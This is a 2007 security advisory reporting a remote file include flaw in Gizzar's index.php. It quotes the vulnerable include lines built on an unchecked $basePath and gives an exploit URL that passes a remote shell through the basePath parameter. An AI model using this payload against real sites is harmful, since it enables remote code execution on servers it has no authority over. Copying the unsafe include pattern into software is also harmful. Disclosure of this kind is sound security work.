Security Advisory: Gizzar <= (basePath) Remote File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [Full-disclosure] freePBX 2.2.x's Music-on-hold Remote Code Execution Injection
  Eba News Version : v1.1 <= (webpages.
php) Remote File Include // starhack.org
  NeatUpload vulnerability and fix
  [waraxe-2007-SA#049] - Multiple vulnerabilities in Phorum 5.1.20

From: BorN To K!LL BorN To K!LL <q.t.i_(at)_hotmail.com>
Date: 20.04.2007
Subject: Gizzar <= (basePath) Remote File Include Vulnerability

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Gizzar <= (basePath) Remote File Include Vulnerability

Download:
http://mesh.dl.sourceforge.net/sourceforge/gizzar/gizzar-03162002.tar.gz

Discover: BorN To K!LL

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:

index.php

code:

include_once($basePath."include/config.php");
include_once($basePath."include/access.php");

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

EploiT:

wWw.SiTe.cOm/[path]/index.php?basePath=Shell

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Greedz 2:

Dr.2 - AsbMay - GolD_M - str0ke ....

wWw.KuW-SeC.cC
wWw.Asb-May.nEt

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

test server